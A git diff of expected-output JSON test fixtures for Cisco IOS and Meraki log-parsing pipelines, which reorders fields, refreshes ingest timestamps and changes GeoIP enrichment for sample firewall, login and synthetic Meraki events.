"Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
@@ -534,28 +525,10 @@ "ip": "192.168.100.12" }, "message": "list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", - "transport": "tcp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.12", - "81.2.69.144" - ] - }, "event": { "severity": 6, "sequence": 1663321, - "ingested": "2021-12-09T13:33:17.492528800Z", + "ingested": "2021-12-14T14:38:00.838131313Z", "original": "Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -568,6 +541,15 @@ "facility": "SEC", "access_list": "150" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", + "transport": "tcp", + "type": "ipv4", + "packets": 1 } }, { @@ -583,7 +565,7 @@ "event": { "severity": 6, "sequence": 1663325, - "ingested": "2021-12-09T13:33:17.492532600Z", + "ingested": "2021-12-14T14:38:00.838131789Z", "original": "Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", "code": "IPACCESSLOGRL", "provider": "firewall", @@ -642,7 +624,7 @@ "event": { "severity": 6, "sequence": 1663326, - "ingested": "2021-12-09T13:33:17.492537400Z", + "ingested": "2021-12-14T14:38:00.838132488Z", "original": "Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "code": "IPACCESSLOGDP", "provider": "firewall", @@ -658,6 +640,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.12", + "81.2.69.144" + ] + }, "log": { "level": "informational", "source": { 
@@ -667,20 +658,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -694,28 +679,10 @@ "ip": "192.168.100.12" }, "message": "list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", - "transport": "tcp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.12", - "81.2.69.144" - ] - }, "event": { "severity": 6, "sequence": 1663327, - "ingested": "2021-12-09T13:33:17.492542900Z", + "ingested": "2021-12-14T14:38:00.838132987Z", "original": "Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -728,9 +695,29 @@ "facility": "SEC", "access_list": "150" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", + "transport": "tcp", + "type": "ipv4", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "john.smith" + ], + "ip": [ + "10.2.55.3" + ] + }, "log": { "level": "notification", "source": { 
@@ -748,27 +735,10 @@ "ip": "10.2.55.3" }, "message": "Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "john.smith" - ], - "ip": [ - "10.2.55.3" - ] - }, "event": { "severity": 5, "sequence": 1991219, - "ingested": "2021-12-09T13:33:17.492547Z", + "ingested": "2021-12-14T14:38:00.838133469Z", "original": "Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", "code": "LOGIN_SUCCESS", "provider": "firewall", @@ -780,6 +750,12 @@ "action": "Login", "facility": "SEC_LOGIN" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { @@ -807,17 +783,17 @@ "address": "10.5.36.9", "ip": "10.5.36.9" }, - "message": "User john.smith has exited tty session 5(10.5.36.9)", "event": { "severity": 6, "sequence": 1991220, - "ingested": "2021-12-09T13:33:17.492551Z", + "ingested": "2021-12-14T14:38:00.838133950Z", "original": "Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", "code": "LOGOUT", "provider": "firewall", "category": "network", "type": "info" }, + "message": "User john.smith has exited tty session 5(10.5.36.9)", "cisco": { "ios": { "action": "exited", @@ -836,6 +812,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.4.5.66", + "10.3.66.3" + ] + }, "log": { "level": "informational", "source": { 
@@ -851,26 +836,11 @@ "ip": "10.4.5.66" }, "message": "Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.4.5.66", - "10.3.66.3" - ] - }, "event": { "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-12-09T13:33:17.492554300Z", + "ingested": "2021-12-14T14:38:00.838134440Z", "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", @@ -890,9 +860,24 @@ "facility": "PIM-SW1", "outcome": "invalid RP" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.4.5.66", + "10.3.66.3" + ] + }, "log": { "level": "informational", "source": { @@ -908,26 +893,11 @@ "ip": "10.4.5.66" }, "message": "Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.4.5.66", - "10.3.66.3" - ] - }, "event": { "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-12-09T13:33:17.492559100Z", + "ingested": "2021-12-14T14:38:00.838135074Z", "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", @@ -950,6 +920,12 @@ "facility": "PIM-SW1", "outcome": "invalid RP" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { 
@@ -965,7 +941,7 @@ "event": { "severity": 4, "sequence": 1991217, - "ingested": "2021-12-09T13:33:17.492564400Z", + "ingested": "2021-12-14T14:38:00.838135554Z", "original": "Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", "code": "NOVALIDKEY", "provider": "firewall", @@ -995,7 +971,7 @@ "event": { "severity": 6, "sequence": 1991218, - "ingested": "2021-12-09T13:33:17.492569200Z", + "ingested": "2021-12-14T14:38:00.838136033Z", "original": "Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", "code": "CALL_PRESERVED", "provider": "firewall", diff --git a/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json index 8659ea62b8f..09b45c7b326 100644 --- a/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "modtempo 1454047799.olab nto_ security_event olaborissecurity_event tur url=https://example.org/odoco/ria.jpg?ritin=uredolor#tatemac src=10.15.44.253:5078 dst=10.193.124.51:5293 mac=01:00:5e:28:ae:7d name=psa sha256=umq disposition=ntium action=deny", "event": { - "ingested": "2021-12-09T13:33:18.888379800Z" + "ingested": "2021-12-14T14:38:02.304888658Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umdo 1455282753.itessequ vol_ events dhcp lease of ip 10.102.218.31 from server mac 01:00:5e:9c:c2:9c for client mac 01:00:5e:0f:87:e3 from router 10.15.16.212 on subnet ameaqu with dns aqu", "event": { - "ingested": "2021-12-09T13:33:18.888383Z" + "ingested": "2021-12-14T14:38:02.304891257Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uipexea 1456517708.tatio minim_ flows ceroinBC flows src=10.179.60.216 dst=10.69.53.104 protocol=udp pattern: 0 reprehe", "event": { - "ingested": "2021-12-09T13:33:18.888388400Z" + "ingested": "2021-12-14T14:38:02.304891737Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mipsu 1457752662.consec taliquip_ flows radip flows block src=10.155.236.240 dst=10.112.46.169 mac=01:00:5e:7a:74:89 protocol=ipv6 type=roidents ", "event": { - "ingested": "2021-12-09T13:33:18.888393Z" + "ingested": "2021-12-14T14:38:02.304892205Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "obeataev 1458987616.lor uidexea_appliance events MAC 01:00:5e:e1:89:ac and MAC 01:00:5e:a3:d9:ac both claim IP: 10.14.107.140", "event": { - "ingested": "2021-12-09T13:33:18.888397400Z" + "ingested": "2021-12-14T14:38:02.304892580Z" + }, + 
"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iutal 1460222571.dexe urerep events content_filtering_block url='https://api.example.org/liqu/lorem.gif?ueipsaqu=uidolore#niamqu' category0='ari' server='10.108.180.105:5098' client_mac='01:00:5e:40:9b:83'", "event": { - "ingested": "2021-12-09T13:33:18.888402700Z" + "ingested": "2021-12-14T14:38:02.304892970Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipit 1461457525.idexea riat_appliance events MAC 01:00:5e:25:4f:e4 and MAC 01:00:5e:3f:49:e4 both claim IP: 10.149.88.198", "event": { - "ingested": "2021-12-09T13:33:18.888407900Z" + "ingested": "2021-12-14T14:38:02.304893364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntsuntin 1462692479.aecatcup animi events dhcp release for mac 01:00:5e:e3:10:34", "event": { - "ingested": "2021-12-09T13:33:18.888413100Z" + "ingested": "2021-12-14T14:38:02.304893748Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orsitame 1463927433.quiratio ite events MAC 01:00:5e:48:62:22 and MAC 01:00:5e:9f:b6:a6 both claim IP: 10.243.206.225", "event": { - "ingested": "2021-12-09T13:33:18.888418300Z" + "ingested": "2021-12-14T14:38:02.304894278Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupta turveli.toccae tatno_ ids-alerts taliqu ids-alerts signature=temUten priority=ccusan timestamp=1465162388.iqudirection=outbound protocol=icmp src=10.131.82.116:7307", "event": { - "ingested": "2021-12-09T13:33:18.888423400Z" + "ingested": "2021-12-14T14:38:02.304894735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "uaera 1466397342.sitas ehenderi_ security_event atquovosecurity_event iumto url=https://www5.example.net/sun/essecill.html?saute=vel#quu src=10.210.213.18:7616 dst=10.134.0.141:2703 mac=01:00:5e:aa:42:fa name=idolores sha256=llumquid disposition=tation action=accept", "event": { - "ingested": "2021-12-09T13:33:18.888428500Z" + "ingested": "2021-12-14T14:38:02.304895120Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "omn ipsumq.atcu oremagna_ security_event remipsum security_event liq signature=ist priority=tnon timestamp=1467632296.ionul shost=01:00:5e:c8:9c:2f direction=outbound protocol=udp src=10.163.72.17 dst=10.74.237.180 message:nsequu", "event": { - "ingested": "2021-12-09T13:33:18.888434400Z" + "ingested": "2021-12-14T14:38:02.304895734Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "omm 1468867250.idestla Nemoeni_appliance events MAC 01:00:5e:c4:69:7f and MAC 01:00:5e:e2:67:d2 both claim IP: 10.72.31.26", "event": { - "ingested": "2021-12-09T13:33:18.888439600Z" + "ingested": "2021-12-14T14:38:02.304896208Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agna tionemu.eomnisis mqui ids-alerts signature=civeli priority=errorsi timestamp=1470102205.desdirection=internal protocol=tcp src=10.70.95.74:4290", "event": { - "ingested": "2021-12-09T13:33:18.888444800Z" + "ingested": "2021-12-14T14:38:02.304896613Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupt 1471337159.dit sumquiad events MAC 01:00:5e:ea:e8:7a and MAC 01:00:5e:9c:d2:4a both claim IP: 10.17.21.125", "event": { - "ingested": "2021-12-09T13:33:18.888449900Z" + "ingested": "2021-12-14T14:38:02.304897059Z" + }, + 
"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amqu 1472572113.uines nsec events dhcp lease of ip 10.85.10.165 from server mac 01:00:5e:63:93:48 for client mac 01:00:5e:46:17:35 from router 10.53.150.119 on subnet uiineavo with dns tisetq", "event": { - "ingested": "2021-12-09T13:33:18.888455Z" + "ingested": "2021-12-14T14:38:02.304897462Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "giatquov eritquii.dexeac iscinge ids-alerts signature=atvol priority=umiur timestamp=1473807067.imadprotocol=igmp src=10.88.231.224 dst=10.187.77.245message: iadese", "event": { - "ingested": "2021-12-09T13:33:18.888460600Z" + "ingested": "2021-12-14T14:38:02.304897998Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agnaali 1475042022.gnam tat events content_filtering_block url='https://internal.example.com/quae/maccusa.htm?rQuisau=idex#xerci' category0='aqu' server='10.186.58.115:7238' client_mac='01:00:5e:8f:16:6d'", "event": { - "ingested": "2021-12-09T13:33:18.888465800Z" + "ingested": "2021-12-14T14:38:02.304898400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "apariat 1476276976.tlabore untmolli_ events dhcp lease of ip 10.219.84.37 from server mac 01:00:5e:e8:bf:69 for client mac 01:00:5e:87:e1:a0 from router 10.205.47.51 on subnet uovolup with dns samvolu", "event": { - "ingested": "2021-12-09T13:33:18.888471Z" + "ingested": "2021-12-14T14:38:02.304898808Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ento 1477511930.pic evita events MAC 01:00:5e:ce:61:db and MAC 01:00:5e:ec:f8:cc both claim IP: 10.3.134.237", "event": { - "ingested": 
"2021-12-09T13:33:18.888476100Z" + "ingested": "2021-12-14T14:38:02.304899200Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tmo 1478746884.fficiade uscipit events aid=vitaedi arp_resp=fugitse arp_src=veniamq auth_neg_dur=one auth_neg_failed=etMalor channel=ipi dns_req_rtt=reseos dns_resp=pariatu dns_server=tin duration=48.123000 full_conn=oquisqu identity=sperna ip_resp=eabilloi ip_src=10.182.178.217 is_8021x=tlab is_wpa=volupt last_auth_ago=osqui radio=xerc reason=iutali rssi=fdeFi type=texp vap=tasuntex client_mac=01:00:5e:e3:b1:24 client_ip=10.194.114.58 instigator=ectio http_resp=dutper dhcp_lease_completed=lamcolab dhcp_ip=ati dhcp_server=tlabo dhcp_server_mac=uames dhcp_resp=iduntu url=https://internal.example.net/ris/uamqu.txt?liqui=quioffi#uptate category0=ncidid server=10.63.194.87 vpn_type=quisno connectivity=sin", "event": { - "ingested": "2021-12-09T13:33:18.888479800Z" + "ingested": "2021-12-14T14:38:02.304899594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emvel 1479981839.tmollita fde events aid=nsecte arp_resp=inculpa arp_src=abo auth_neg_dur=veniamqu auth_neg_failed=nse channel=non dns_req_rtt=paquioff dns_resp=mquisnos dns_server=maven duration=71.798000 full_conn=atcu identity=labor ip_resp=didunt ip_src=10.153.0.77 is_8021x=udan is_wpa=orema last_auth_ago=invento radio=qua reason=aturQui rssi=utlabor type=rau vap=idex client_mac=01:00:5e:9e:7b:a4 client_ip=10.105.88.20 instigator=ecte http_resp=tinvolu dhcp_lease_completed=iurer dhcp_ip=iciadese dhcp_server=quidolor dhcp_server_mac=tessec dhcp_resp=olupta url=https://mail.example.com/icabo/itatio.jpg?eleum=sintoc#volupt category0=siste server=10.163.154.210 vpn_type=ept connectivity=iumtotam", "event": { - "ingested": "2021-12-09T13:33:18.888483Z" + "ingested": "2021-12-14T14:38:02.304899981Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ionevo 1481216793.ugiatnu ciati_appliance events MAC 01:00:5e:b8:7a:96 and MAC 01:00:5e:b9:6b:a8 both claim IP: 10.73.69.176", "event": { - "ingested": "2021-12-09T13:33:18.888487100Z" + "ingested": "2021-12-14T14:38:02.304900385Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "spi 1482451747.stquido ommodico_ flows ese flows allow src=10.145.248.111 dst=10.57.6.252 mac=01:00:5e:94:6a:cf protocol=udp ", "event": { - "ingested": "2021-12-09T13:33:18.888491800Z" + "ingested": "2021-12-14T14:38:02.304900901Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "smo etcons.iusmodi uamest_ security_event uiac security_event epte signature=idolo priority=quinesc timestamp=1483686701.madmi shost=01:00:5e:1c:4c:64 direction=internal protocol=icmp src=10.31.77.157 dst=10.12.182.70 message:tev", "event": { - "ingested": "2021-12-09T13:33:18.888496400Z" + "ingested": "2021-12-14T14:38:02.304901289Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nisiuta 1484921656.roid inibusB flows cancel", "event": { - "ingested": "2021-12-09T13:33:18.888500Z" + "ingested": "2021-12-14T14:38:02.304901677Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "str 1486156610.idolore pid_ flows cteturad flows deny src=10.93.68.231 dst=10.135.217.12 mac=01:00:5e:4a:69:5b protocol=ipv6 type=archite ", "event": { - "ingested": "2021-12-09T13:33:18.888504200Z" + "ingested": "2021-12-14T14:38:02.304902066Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amnih 
1487391564.ium esciuntN_ events dhcp release for mac 01:00:5e:8b:99:98", "event": { - "ingested": "2021-12-09T13:33:18.888508100Z" + "ingested": "2021-12-14T14:38:02.304902454Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isnost 1488626519.queips ncidi_ flows iscinge flows src=10.247.30.212 dst=10.66.89.5 mac=01:00:5e:7f:65:da protocol=igmp pattern: 1 borios", "event": { - "ingested": "2021-12-09T13:33:18.888511700Z" + "ingested": "2021-12-14T14:38:02.304902840Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oin 1489861473.mvenia madminim events IDS: fugitsed", "event": { - "ingested": "2021-12-09T13:33:18.888515700Z" + "ingested": "2021-12-14T14:38:02.304903226Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmin fugi.quia iduntu security_event idestlab signature=rnatur priority=ofdeFin timestamp=1491096427.essequam dhost=01:00:5e:c1:53:b1 direction=inbound protocol=tcp src=10.221.102.245 dst=10.173.136.186 message:naal", "event": { - "ingested": "2021-12-09T13:33:18.888519100Z" + "ingested": "2021-12-14T14:38:02.304903622Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umqu tinv.adipisc uscipitl_ ids-alerts ritatise ids-alerts signature=uamei priority=siut timestamp=1492331381.ciad dhost=01:00:5e:1f:c6:29 direction=external protocol=udp src=10.58.64.108 dst=10.54.37.86 message: entorev", "event": { - "ingested": "2021-12-09T13:33:18.888523500Z" + "ingested": "2021-12-14T14:38:02.304904009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "velitess 1493566336.naali uunturm_ flows veli flows block src=10.147.76.202 dst=10.163.93.20 
mac=01:00:5e:1d:85:ec protocol=ipv6 sport=1085 dport=3141 ", "event": { - "ingested": "2021-12-09T13:33:18.888528800Z" + "ingested": "2021-12-14T14:38:02.304904386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iumdol tpersp.stla uptatema_ security_event uradi security_event tot signature=llamco priority=nea timestamp=1494801290.psum dhost=01:00:5e:35:71:1e direction=internal protocol=icmp src=10.0.200.27:5905 dst=10.183.44.198:1702 message:asiarc", "event": { - "ingested": "2021-12-09T13:33:18.888534Z" + "ingested": "2021-12-14T14:38:02.304904784Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tiaec 1496036244.rumwrit icabo_ events dhcp lease of ip 10.148.124.84 from server mac 01:00:5e:0b:2c:22 for client mac 01:00:5e:06:12:98 from router 10.28.144.180 on subnet ritin with dns temporin", "event": { - "ingested": "2021-12-09T13:33:18.888539300Z" + "ingested": "2021-12-14T14:38:02.304905286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ica 1497271198.lillum remips_appliance events aid=uisaute arp_resp=imide arp_src=poriss auth_neg_dur=tvolup auth_neg_failed=itesseq channel=dictasun dns_req_rtt=veniamqu dns_resp=rum dns_server=quaea duration=165.611000 full_conn=mvel identity=nof ip_resp=usmodi ip_src=10.204.230.166 is_8021x=dat is_wpa=aincidu last_auth_ago=nimadmin radio=isiu reason=licabo rssi=enimadmi type=utaliqu vap=dic client_mac=01:00:5e:bb:60:a6 client_ip=10.62.71.118 instigator=ineavol http_resp=iosa dhcp_lease_completed=boNemoe dhcp_ip=onsequ dhcp_server=equinesc dhcp_server_mac=cab dhcp_resp=atisund url=https://example.net/ites/isetq.gif?nisiut=tur#avolupt category0=ariatur server=10.98.194.212 vpn_type=nimave connectivity=isciv", "event": { - "ingested": "2021-12-09T13:33:18.888544400Z" + 
"ingested": "2021-12-14T14:38:02.304905676Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dipisci 1498506153.spernatu admi events content_filtering_block url='https://www.example.org/ueipsa/tae.html?eriti=atcupi#corpori' category0='borisnis' server='10.197.13.39:5912'", "event": { - "ingested": "2021-12-09T13:33:18.888549600Z" + "ingested": "2021-12-14T14:38:02.304906058Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "itsedd 1499741107.leumiur eratvol events dhcp release for mac 01:00:5e:fd:84:bb", "event": { - "ingested": "2021-12-09T13:33:18.888554800Z" + "ingested": "2021-12-14T14:38:02.304906468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "leumiu tla.item nimid ids-alerts signature=dat priority=periam timestamp=1500976061.dquprotocol=icmp src=10.242.77.170 dst=10.150.245.88message: orisn", "event": { - "ingested": "2021-12-09T13:33:18.888560Z" + "ingested": "2021-12-14T14:38:02.304906856Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitam rad.loi isc_ ids-alerts volupt ids-alerts signature=rem priority=idid timestamp=1502211015.tesse shost=01:00:5e:9d:eb:fb direction=external protocol=tcp src=10.247.139.239 dst=10.180.195.43 message: tenatuse", "event": { - "ingested": "2021-12-09T13:33:18.888565200Z" + "ingested": "2021-12-14T14:38:02.304907244Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tore 1503445970.elits consequa events dhcp release for mac 01:00:5e:50:48:c4", "event": { - "ingested": "2021-12-09T13:33:18.888570300Z" + "ingested": "2021-12-14T14:38:02.304907626Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "undeom uamnihi.risnis uov_ ids-alerts isn ids-alerts signature=sBono priority=loremqu timestamp=1504680924.teturprotocol=rdp src=10.94.6.140 dst=10.147.15.213message: uptat", "event": { - "ingested": "2021-12-09T13:33:18.888575500Z" + "ingested": "2021-12-14T14:38:02.304908022Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "itasper 1505915878.uae mve_ flows obeata flows block src=10.230.6.127 dst=10.111.157.56 mac=01:00:5e:39:a7:fc protocol=icmp type=aliquamq ", "event": { - "ingested": "2021-12-09T13:33:18.888580600Z" + "ingested": "2021-12-14T14:38:02.304908479Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "archite 1507150832.remq veniamq events aid=occ arp_resp=oloreseo arp_src=iruredol auth_neg_dur=veniamqu auth_neg_failed=licaboN channel=atquo dns_req_rtt=cupi dns_resp=strude dns_server=eritin duration=85.513000 full_conn=litsedq identity=nderiti ip_resp=ntNe ip_src=10.179.40.170 is_8021x=olorema is_wpa=mollita last_auth_ago=tatem radio=iae reason=quido rssi=emip type=inBC vap=mol client_mac=01:00:5e:58:2d:1c client_ip=10.153.81.206 instigator=rsita http_resp=nsequun dhcp_lease_completed=eetd dhcp_ip=illu dhcp_server=iatqu dhcp_server_mac=lorsi dhcp_resp=repreh url=https://www.example.net/irured/illumqui.txt?tionula=ritqu#ecatcupi category0=uamei server=10.193.219.34 vpn_type=onse connectivity=olorem", "event": { - "ingested": "2021-12-09T13:33:18.888585800Z" + "ingested": "2021-12-14T14:38:02.304908887Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umwritte 1508385787.vol oremquel_appliance events MAC 01:00:5e:16:5e:b1 and MAC 01:00:5e:ee:e8:77 both claim IP: 10.255.199.16", "event": { - "ingested": 
